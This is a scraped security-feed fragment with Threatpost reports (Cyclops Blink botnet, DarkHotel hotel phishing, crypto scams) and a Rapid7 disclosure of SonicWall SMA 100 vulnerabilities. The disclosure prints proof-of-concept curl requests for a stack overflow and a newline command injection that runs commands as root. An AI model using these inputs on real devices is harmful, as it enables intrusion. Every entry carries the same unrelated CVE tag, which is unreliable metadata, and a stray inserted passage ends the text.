_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T17:32:59", "type": "threatpost", "title": "\u2018CryptoRom\u2019 Crypto Scam is Back via Side-Loaded Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T17:32:59", "id": "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "href": "https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T14:20:09", "description": "Why in the world would a collection of nonfungible token (NFT) gorilla avatars called the Bored Ape Yacht Club (BAYC), run by 30-somethings using aliases like \u201cEmperor Tomato Ketchup\u201d and \u201cNo Sass\u201d and [adored by celebrities](<https://www.vanityfair.com/news/2022/02/bored-ape-yacht-club-revealed>), spiral on up to a [multibillion-dollar valuation](<https://www.coingecko.com/en/nft/bored-ape-yacht-club>) (\u2026and, by the way, how can you yourself get stinking 
crypto-rich?!)?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-scaled-e1648669046321.jpeg>)\n\nImage of Bored Ape Yacht Club NFT.\n\nIf you don\u2019t have a clue, you might be one of the crypto-newbies for whom the New York Times recently pulled together its [Latecomer\u2019s Guide to Crypto](<https://www.nytimes.com/interactive/2022/03/18/technology/cryptocurrency-crypto-guide.html>) and whom [mutual funds companies](<https://www.fidelity.com/viewpoints/active-investor/beyond-bitcoin>) are trying to [ease into](<https://economictimes.indiatimes.com/markets/cryptocurrency/crypto-investment-in-mutual-funds-style-mudrex-launches-coin-sets/articleshow/87099763.cms?from=mdr>) the brave new world.\n\nYou also might have a thousand questions that go beyond cartoon apes and get into the nitty-gritty of how cryptocurrency and blockchain technologies work and how to sidestep the associated cybersecurity risks.\n\nThose risks are big, throbbing realities. The latest: Ronin, an Ethereum-linked blockchain platform for NFT-based video game Axie Infinity, on Tuesday put up a [blog post](<https://roninblockchain.substack.com/p/community-alert-ronin-validators?s=w>) advising that 173,600 ether tokens and 25.5 million USD coins \u2013 valued at nearly $620 million as of Tuesday \u2013 had been drained from its platform after an attacker used hacked private keys to forge two fake withdrawals last week.\n\nAccording to [Forbes](<https://www.forbes.com/sites/jonathanponciano/2022/03/29/second-biggest-crypto-hack-ever-600-million-in-ethereum-stolen-from-nft-gaming-blockchain/?sh=280f0f0c2686>), blockchain analytics firm Elliptic pegs it as the second-biggest hack ever.\n\n## New Technology, Old Hacks\n\nCryptocurrency and related technologies may be shiny new concepts, but the techniques crooks are using to drain them aren\u2019t necessarily newfangled. 
As of its Wednesday update, Ronin said that it looks like the breach was pulled off with old-as-the-hills social engineering:\n\n> \u201cWhile the investigations are ongoing, at this point we are certain that this was an external breach. All evidence points to this attack being socially engineered, rather than a technical flaw.\u201d \u20143/30/22 Ronin alert.\n\nDr. Lydia Kostopoulos, senior vice president of emerging tech insights at [KnowBe4](<https://www.knowbe4.com/>), stopped by the Threatpost podcast to give us an overview of this brave new world of blockchain: a landscape of new technologies that makes wallets swell and shrink, and hearts flutter in dismay when such things as the Ronin hack transpire.\n\nShe shared her insights into everything from how such technologies work to what the associated cybersecurity risks are, including:\n\n * How blockchain technologies, including NFTs, work.\n * The cybersecurity risks that might emerge from the use of NFTs/cryptocurrency, including popular scams/social engineering attempts circulating today.\n * Steps individuals/businesses can take to protect themselves.\n * What is driving their popularity and if NFTs are here to stay.\n * Regulations on blockchain technology.\n\nYou\u2019ve heard it a thousand times before, but Dr. Kostopoulos says it\u2019s real: Blockchain technology is transformative. Look out for state-backed currencies and blockchain-enabled voting that can\u2019t be tampered with, for starters. Look for NFT invitations to artists\u2019 performances that keep giving as those artists reward their ticket holders with future swag. And for the love of Pete, don\u2019t lose your cold wallets if you want to keep your crypto safe.\n\nIf you don\u2019t yet know what a cold wallet is, definitely have a listen!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/032522_KnowBe4_Lydia_mixdown_2.mp3>). 
For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T13:00:09", "type": "threatpost", "title": "A Blockchain Primer and Bored Ape Headscratcher \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T13:00:09", "id": "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "href": "https://threatpost.com/a-blockchain-primer-and-a-bored-ape-headscratcher-podcast/179179/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T17:24:48", 
"description": "The modular botnet known as Cyclops Blink, linked to the same advanced persistent threat (APT) behind the [NotPetya wiper attacks](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), is expanding its device targeting to include ASUS routers.\n\nFurther, it\u2019s likely that the botnet\u2019s purpose is far more sinister than the average [Mirai-knockoff\u2019s penchant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) for distributed denial-of-service (DDoS) attacks.\n\nThat\u2019s the word from Trend Micro researchers, who noted that Cyclops Blink casts a wide net in terms of the owners of the devices it chooses to infect, with no specific focus on high-value government or diplomatic entities. While that\u2019s out of step with typical APT behavior, researchers said that it\u2019s likely the botnet will be used as persistent infrastructure for mounting further attacks on high-value targets, and as such, should be indiscriminately distributed for maximum effect.\n\n\u201cIt should be noted that these victims do not appear to be evidently valuable targets for either economic, military or political espionage,\u201d according to the firm\u2019s analysis. \u201cFor example, some of the live command-and-control servers (C2s) are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe and a plumber in the United States.\u201d\n\nCyclops Blink itself has been around since 2019, initially looking to infect WatchGuard Firebox devices according to a [February analysis (PDF)](<https://www.ncsc.gov.uk/files/Cyclops-Blink-Malware-Analysis-Report.pdf>) performed by the UK\u2019s National Cyber Security Centre (NCSC). 
Now, to further its goal of widescale infection, ASUS routers are on the menu too, Trend Micro noted, with the latest variant incorporating a fresh module tailored to the vendor\u2019s devices.\n\n\u201cOur research was carried out on the RT-AC68U, but other ASUS routers such as RT-AC56U might be affected as well,\u201d researchers said. \u201cOur investigation shows that there are more than 200 Cyclops Blink victims around the world. Typical countries of infected WatchGuard devices and ASUS routers are the United States, India, Italy, Canada and a long list of other countries, including Russia.\u201d\n\n## **A Sinister Purpose?**\n\nCyclops Blink is the handiwork of the Russian-speaking Sandworm APT (a.k.a. Voodoo Bear or TeleBots), according to Trend Micro \u2013 the same group that\u2019s been [linked to a host of](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) very high-profile state-sponsored attacks, as well as the VPNFilter internet-of-things (IoT) botnet.\n\n\u201cSandworm was also responsible for\u2026the [2015 and 2016 attacks on the Ukrainian electrical grid](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), the 2017 NotPetya attack, the 2017 French presidential campaign, the [2018 Olympic Destroyer attack](<https://threatpost.com/olympic-destroyer-malware-behind-winter-olympics-cyberattack-researchers-say/129918/>) on the Winter Olympic Games and a 2018 operation against the Organization for the Prohibition of Chemical Weapons (OPCW),\u201d researchers noted in a [Thursday analysis](<https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html>).\n\nInternet routers have been a favorite target for building out botnets for many years, thanks to \u201cinfrequency of patching, the lack of security software and the limited visibility of defenders\u201d when it comes to these devices, as Trend Micro put it. 
More often than not, such botnets are used to carry out DDoS attacks; but in Cyclops Blink\u2019s case, the motives are less obvious.\n\n\u201cThe purpose of this botnet is still unclear: Whether it is intended to be used for DDoS attacks, espionage or proxy networks remains to be seen,\u201d researchers said. \u201cBut what is evident is that Cyclops Blink is an advanced piece of malware that focuses on persistence and the ability to survive domain sinkhole attempts and the takedown of its infrastructure.\u201d\n\nIn fact, some of the infected devices that researchers observed have been compromised for more than two and a half years, with some set up as stable C2 servers for other bots.\n\nIt is thus likely, the researchers speculated, that Cyclops Blink is destined for bigger horizons than denial of service.\n\n\u201cThe more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers,\u201d according to the analysis, which raised the specter of \u201ceternal botnets.\u201d\n\n\u201cOnce an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying or anything else that the attacker wants to do,\u201d researchers warned. \u201cThe underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. 
This can allow attackers to add anything else that they might need to complete their attacks.\u201d\n\nGiven Sandworm\u2019s track record, it\u2019s wise to expect the worst, the firm noted.\n\n\u201cSandworm\u2019s previous high-profile victims and their attacks\u2019 substantial impact on these organizations are particularly worrying \u2014 even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best,\u201d researchers said.\n\n## **A Few Technical Specifics on a New Botnet Variant**\n\nCoded in the C language, Cyclops Blink relies on hard-coded TCP ports to communicate with a range of command-and-control servers (C2s), according to the analysis. For each port, it creates a rule in the Netfilter Linux kernel firewall to allow output communication to it.\n\nOnce it\u2019s made contact, the malware initializes an OpenSSL library, and its core component then cranks up operations for a series of hard-coded modules.\n\n\u201cCommunication with the modules is performed via pipes,\u201d according to Trend Micro. \u201cFor each hard-coded module, the malware creates two pipes before executing them in their own child processes.\u201d\n\nThe malware then pushes various parameters to the modules, which in turn respond with data that the core component encrypts with OpenSSL functions before sending it to the C2 server.\n\n\u201cThe data is encrypted using AES-256 in cipher block chaining (CBC) mode with a randomly generated 256-bit key and 128-bit initialization vector (IV). It is then encrypted using a hard-coded RSA-2560 (320-bit) public key unique to each sample,\u201d according to the analysis. 
\u201cThe C2 server must have the corresponding RSA private key to decrypt the data.\u201d\n\nResearchers added, \u201cTo send data to the C2 server, the core component performs a TLS handshake with a randomly chosen C2 server at a random TCP port, both of which are from a hard-coded list.\u201d\n\nInitially, the core component sends a list of supported commands to the C2 server and then waits to receive one of the commands back. These can be aimed at the core component itself or at one of its modules, according to the writeup.\n\nIf a command targets the core component, it can be one of the following:\n\n * Terminate the program\n * Bypass the data-sending interval and send data to C2 servers immediately\n * Add a new C2 server to the list in memory\n * Set time to send the next packet to the C2 server\n * Add a new module (an ELF file should be received following the command)\n * Reload the malware\n * Set the local IP address parameter\n * Set a new worker ID\n * Set an unknown byte value\n * Resend configuration to all running modules\n\nAs for the commands meant for the modules, the latest variant studied by Trend Micro now includes \u201cAsus (0x38),\u201d meant to activate a brand-new module built to infect ASUS routers.\n\n## **Targeting ASUS Routers**\n\nThe ASUS module is built to access and replace a router\u2019s flash memory, thus enslaving it to the botnet, researchers explained.\n\n\u201cThis module can read and write from the devices\u2019 flash memory,\u201d they said. 
\u201cThe flash memory is used by these devices to store the operating system, configuration and all files from the file system.\u201d\n\nCyclops Blink reads 80 bytes from the flash memory, writes it to the main pipe, and then waits for a command with the data needed to replace the content.\n\n\u201cAs the flash memory content is permanent, this module can be used to establish persistence and survive factory resets,\u201d researchers explained.\n\nA second module, straightforwardly called \u201csystem reconnaissance (0x08),\u201d is responsible for gathering various data from the infected device and sending it to the C2 server.\n\nSpecifically, it harvests:\n\n * The Linux version of the device\n * Information about the device\u2019s memory consumption\n * The SSD storage information\n * The content of the following files: \n * /etc/passwd\n * /etc/group\n * /proc/mounts\n * /proc/partitions\n * Information about network interfaces\n\nA third module, \u201cfile download (0x0f),\u201d can download files from the internet using DNS over HTTPS (DoH).\n\nTrend Micro noted that ASUS is likely not the only new module that will emerge for the botnet. After all, Sandworm\u2019s previous botnet, VPNFilter, targeted a wide range of router vendors, including ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL and ZDE.\n\n\u201cWe have evidence that other routers are affected too, but as of reporting, we were not able to collect Cyclops Blink malware samples for routers other than WatchGuard and ASUS,\u201d according to the analysis. \u201cBased on our observation, we strongly believe that there are more targeted devices from other vendors. 
This malware is modular in nature, and it is likely that each vendor has different modules and architectures that were thought out well by the Cyclops Blink actors.\u201d\n\n## **How to Defend Against Becoming a Botnet Victim**\n\nAs with other botnets, organizations can protect themselves from Cyclops Blink attacks by falling back on basic security hygiene, Trend Micro noted, including the use of strong passwords, using a virtual private network (VPN), regular firmware patching and so on. Most successful compromises are the result of default or weak password use or the exploitation of known vulnerabilities.\n\nIf an organization\u2019s devices have been infected with Cyclops Blink, researchers said that the best course of action is to chuck the victimized router for a new one, given the malware\u2019s prodigious persistence capabilities.\n\n\u201cIt is best to get a new router,\u201d they explained. \u201cPerforming a factory reset might blank out an organization\u2019s configuration, but not the underlying operating system that the attackers have modified. If a particular vendor has firmware updates that can address a Cyclops Blink attack or any other weakness in the system, organizations should apply these as soon as possible. However, in some cases, a device might be an end-of-life product and will no longer receive updates from its vendor. In such cases, an average user would not have the ability to fix a Cyclops Blink infection.\u201d
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T17:17:17", "type": "threatpost", "title": "Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T17:17:17", "id": "THREATPOST:6D28B6E17A92FE11F55907C143B3F5DD", "href": "https://threatpost.com/sandworm-asus-routers-cyclops-blink-botnet/178986/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T18:54:13", "description": "An advanced persistent threat (APT) group has been targeting luxury hotels in Macao, China with a spear-phishing campaign aimed at breaching their networks and stealing the 
sensitive data of high-profile guests staying at resorts, including the Grand Coloane Resort and Wynn Palace.\n\nA threat research report from Trellix \u201ccautiously\u201d identified the South Korean [DarkHotel APT group](<https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html>) as the culprit behind the attacks.\n\nThe researchers said the spear-phishing campaign began at the tail end of November, with emails loaded with malicious Excel macros being sent to ranking hotel management with access to hotel networks, including human resources and office managers.\n\nIn one attack wave, phishing emails were sent to 17 different hotels on Dec. 7 and faked to look like they were sent from the Macao Government Tourism Office, to gather information about who was staying at the hotels. The emails asked the recipient to open an attached Excel file labeled \u201cpassenger inquiry.\u201d\n\n\u201cPlease open the attached file with enable content and specify whether the people were staying at the hotel or not?\u201d the malicious email read, according to the threat researchers with Trellix. The communication was signed from the \u201cInspection Division \u2013 MGTO.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/18144945/darkhotel-attack-flow-chart.png>)\n\nThe DarkHotel attack flow. 
Source: Trellix.\n\nTrellix was able to attribute the attacks to DarkHotel with a \u201cmoderate\u201d level of confidence due to the IP address for the command-and-control server (C2), which was previously attached to the group; the targeting of hotels, which DarkHotel is already infamous for; and patterns found in the C2 setup which match known DarkHotel activities, the report said.\n\n\u201cHowever, we have lowered our confidence level to moderate because the specific IP address remained active for quite some time even after being publicly exposed, and the same IP address is the origin of other malicious content not related to this specific threat,\u201d the Trellix team said. \u201cThese two observations have made us more cautious in our attribution.\u201d\n\n## **DarkHotel Suspected of Stealing Data for Future Attacks**\n\nOnce opened, the macros contacted the C2 server to begin data exfiltration from the hotel networks, the Trellix team explained.\n\n\u201cThe command-and-control server, hxxps://fsm-gov(.)com, used to spread this campaign was trying to impersonate a legitimate government website domain for the Federated States of Micronesia,\u201d Trellix\u2019s report added. \u201cHowever, the real Micronesia website domain is \u2018fsmgov.org.\u2019\u201d\n\nThe Trellix team said they suspected the attackers were collecting data to be used later.\n\n\u201cAfter researching the event agenda for the targeted hotels, we did indeed find multiple conferences that would have been of interest to the threat actor,\u201d the Trellix researchers reported. \u201cFor instance, one hotel was hosting an International Environment Forum and an International Trade & Investment Fair, both of which would attract potential espionage targets.\u201d\n\nThe spear-phishing campaign stopped on Jan. 18, the team said.\n\n## **COVID-19 Stalls Campaign**\n\nThat said, the COVID-19 pandemic cancelled or delayed these events, giving law enforcement time to catch on. By Dec. 
2021, the Macao Security Force Bureau received a notification from the Cyber Security Incident Alert and Emergency Response Center of the police department that a domain similar to the official Security Force page was being used to spread malware and \u201ccommit illegal acts.\u201d\n\nBesides targeting hotels, other campaigns attributed to the same C2 IP address, believed to be controlled by DarkHotel, included going after MetaMask crypto users with a spoofed Collab.Land phishing page, the Trellix report added.\n\nDarkHotel has a long history of targeting Chinese victims. In April 2020, the APT group went after Chinese virtual private network (VPN) service provider SangFor, used by several Chinese government agencies. By the end of the first week of that month, at least 200 endpoints had been compromised, according to reports.\n\nAround the same time, at the start of the COVID-19 pandemic, [DarkHotel targeted the systems of the World Health Organization](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>).\n\nAttacks like these show how attractive data stored in hotel networks can be for threat actors. Hotel operators should recognize that cybersecurity needs to reach beyond their networks\u2019 edge, the Trellix team advised. Travelers likewise need to take appropriate security precautions, Trellix added.\n\n\u201cOnly bring the essential devices with limited data, keep security systems up to date and make use of a VPN service when using hotel Wi-Fi,\u201d the report said.
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T18:53:40", "type": "threatpost", "title": "DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T18:53:40", "id": "THREATPOST:B3A92C43D5FF3C53BE8EF06C687B80B6", "href": "https://threatpost.com/darkhotel-apt-wynn-macao-hotels/178989/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-01-11T15:27:04", "description": "\n\nOver the course of routine security research, Rapid7 researcher Jake Baines discovered and reported five vulnerabilities involving the SonicWall Secure Mobile Access 
(SMA) 100 series of devices, which includes SMA 200, 210, 400, 410, and 500v. The most serious of these issues can lead to unauthenticated remote code execution (RCE) on affected devices. We reported these issues to SonicWall, who published [software updates](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) and have released fixes to customers and channel partners on December 7, 2021. Rapid7 urges users of the SonicWall SMA 100 series to apply these updates as soon as possible. The table below summarizes the issues found.\n\n**CVE ID** | **CWE ID** | **CVSS** | **Fix** \n---|---|---|--- \nCVE-2021-20038 | [CWE-121: Stack-Based Buffer Overflow](<https://cwe.mitre.org/data/definitions/121.html>) | [9.8](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \nCVE-2021-20039 | [CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u201cOS Command Injection\u201d)](<https://cwe.mitre.org/data/definitions/78.html>) | [7.2](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \nCVE-2021-20040 | [CWE-23: Relative Path Traversal](<https://cwe.mitre.org/data/definitions/23.html>) | [6.5](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \nCVE-2021-20041 | [CWE-835: Loop With Unreachable Exit Condition (\u201cInfinite Loop\u201d)](<https://cwe.mitre.org/data/definitions/835.html>) | [7.5](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \nCVE-2021-20042 | 
[CWE-441: Unintended Proxy or Intermediary (\u201cConfused Deputy\u201d)](<https://cwe.mitre.org/data/definitions/441.html>) | [6.5](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N&version=3.1>) | [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) \n \nThe rest of this blog post goes into more detail about the issues. Vulnerability checks are available to InsightVM and Nexpose customers for all five of these vulnerabilities.\n\n## Product description\n\nThe SonicWall SMA 100 series is a popular edge network access control system, which is implemented as either a standalone hardware device, a virtual machine, or a hosted cloud instance. More about the SMA 100 series of products can be found [here](<https://www.sonicwall.com/products/remote-access/secure-mobile-access-100-series/>). \n\nTesting was performed on the SMA 500v firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. CVE-2021-20038 and CVE-2021-20040 affect only devices running version 10.2.x, while the remaining issues affect both firmware versions. Note that the vendor has released updates, documented in their KB article [SNWLID-2021-0026](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>), to address all these issues.\n\n## Credit\n\nThese issues were discovered by [Jake Baines](<https://twitter.com/Junior_Baines>), Lead Security Researcher at Rapid7. These issues are being disclosed in accordance with [Rapid7's vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## CVE-2021-20038: Stack-based buffer overflow in httpd\n\n**Affected version:** 10.2.1.2-24sv\n\nThe web server on tcp/443 (/usr/src/EasyAccess/bin/httpd) is a slightly modified version of the Apache httpd server. One of the notable modifications is in the mod_cgi module (/lib/mod_cgi.so). 
Specifically, there appears to be a custom version of the `cgi_build_command` function that appends all the environment variables onto a single stack-based buffer using `strcat`.\n\nThere is no bounds-checking on this environment string buildup, so if a malicious attacker were to generate an overly long `QUERY_STRING`, they can overflow the stack-based buffer. The buffer itself is declared at the top of the `cgi_handler` function as a 202-byte character array (although it's followed by a lot of other stack variables, so the depth needed to cause the overflow is a fair amount more).\n\nRegardless, the following `curl` command demonstrates the crash when sent by a remote and unauthenticated attacker:\n\n`curl --insecure \"https://10.0.0.7/?AAAA[1794 more A's here for a total of 1798 A's]\"`\n\nThe above will trigger the following crash and backtrace:\n\n\n\nTechnically, the above crash is due to an invalid read, but you can see the stack has been successfully overwritten above. A functional exploit should be able to return to an attacker's desired address. The system does have address space layout randomization (ASLR) enabled, but it has three things working against this protection:\n\n 1. httpd's base address is not randomized.\n 2. When httpd crashes, it is automatically restarted, giving the attacker the opportunity to guess library base addresses, if needed.\n 3. SMA 100 series devices are 32-bit systems, and ASLR entropy is low enough that guessing library addresses is a feasible approach to exploitation.\n\nBecause of these factors, a reliable exploit for this issue is plausible. 
It's important to note that httpd is running as the \"nobody\" user, so attackers don't get to go straight to root access, but it's one step away, as the exploit payload can su to root using the password \"password.\"\n\n### CVE-2021-20038 exploitation impact\n\nThis stack-based buffer overflow has a suggested CVSS score of [9.8](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H&version=3.1>) out of 10 \u2014 by exploiting this issue, an attacker can get complete control of the device or virtual machine that's running the SMA 100 series appliance. This can allow attackers to install malware to intercept authentication material from authorized users, or reach back into the networks protected by these devices for further attack. Edge-based network control devices are especially attractive targets for attackers, so we expect continued interest in these kinds of devices by researchers and criminal attackers alike.\n\n## CVE-2021-20039: Command injection in cgi-bin\n\n**Affected versions:** 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv\n\nThe web interface uses a handful of functions to scan user-provided strings for shell metacharacters in order to prevent command injection vulnerabilities. There are three functions that implement this functionality (all of which are defined in libSys.so): isSafeCommandArg, safeSystemCmdArg, and safeSystemCmdArg2.\n\nThese functions all scan for the usual characters (&|$><;' and so on), but they do not scan for the newline character ('\\n'). This is problematic because `system` hands the string to `/bin/sh`, and the shell treats a newline as a command terminator, so whatever follows it runs as a separate command. There are a variety of vectors an attacker could use to bypass these checks and hit `system`, and one (but certainly not the only) example is `/cgi-bin/viewcert`, which we'll describe in more detail here.\n\nThe web interface allows authenticated individuals to upload, view, or delete SSL certificates. 
When deleting a certificate, the user provides the name of the directory that the certificate is in. These names are auto-generated by the system in the format of newcert-1, newcert-2, newcert-3, etc. A normal request would define something like `CERT=newcert-1`. The CERT variable makes it to a `system` call as part of an `rm -rf %s` command. Therefore, an attacker can execute arbitrary commands by embedding a '\\n' in CERT. For example, the following would execute ping to 10.0.0.9:\n\n`CERT=nj\\n ping 10.0.0.9 \\n`\n\nTo see that in a real request, we have to first log in:\n\n`curl -v --insecure -F username=admin -F password=labpass1 -F domain=LocalDomain -F portalname=VirtualOffice -F ajax=true https://10.0.0.6/cgi-bin/userLogin`\n\nThe system will set a `swap` cookie. That's your login token, which can be copied into the following request. The following request executes ping via viewcert:\n\n`curl -v --insecure --Cookie swap=WWR0MElDSXJuTjdRMElTa3lQTmRPcndnTm5xNWtqN0tQQUlLZjlKZTM1QT0= -H \"User-Agent: SonicWALL Mobile Connect\" -F buttontype=delete -F $'CERT=nj \\nping 10.0.0.9 \\n' https://10.0.0.6/cgi-bin/viewcert`\n\nIt's important to note that `viewcert` elevates privileges so that when the attacker hits `system`, they have root privileges.\n\n### CVE-2021-20039 exploitation impact\n\nNote that this vulnerability is post-authentication and leverages the administrator account (only administrators can manipulate SSL certificates). An attacker would already need to know (or guess) a working username and password in order to elevate access from administrator to root-level privileges. In the ideal case, this is a non-trivial barrier to entry for attackers. 
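To make the newline gap concrete, here is an added Python example (not SonicWall's code, and not part of the original post). It models the blocklist check described above, shows how the `CERT` value from the request splits into two shell commands once it reaches `system`, and contrasts that with an allowlist on the `newcert-N` names plus a shell-free argv call. The exact blocklist contents, the function names and the certificate base directory are assumptions.

```python
"""Added example, not SonicWall code: the newline gap in a shell-metacharacter
blocklist, as described for CVE-2021-20039, beside an allowlist fix.

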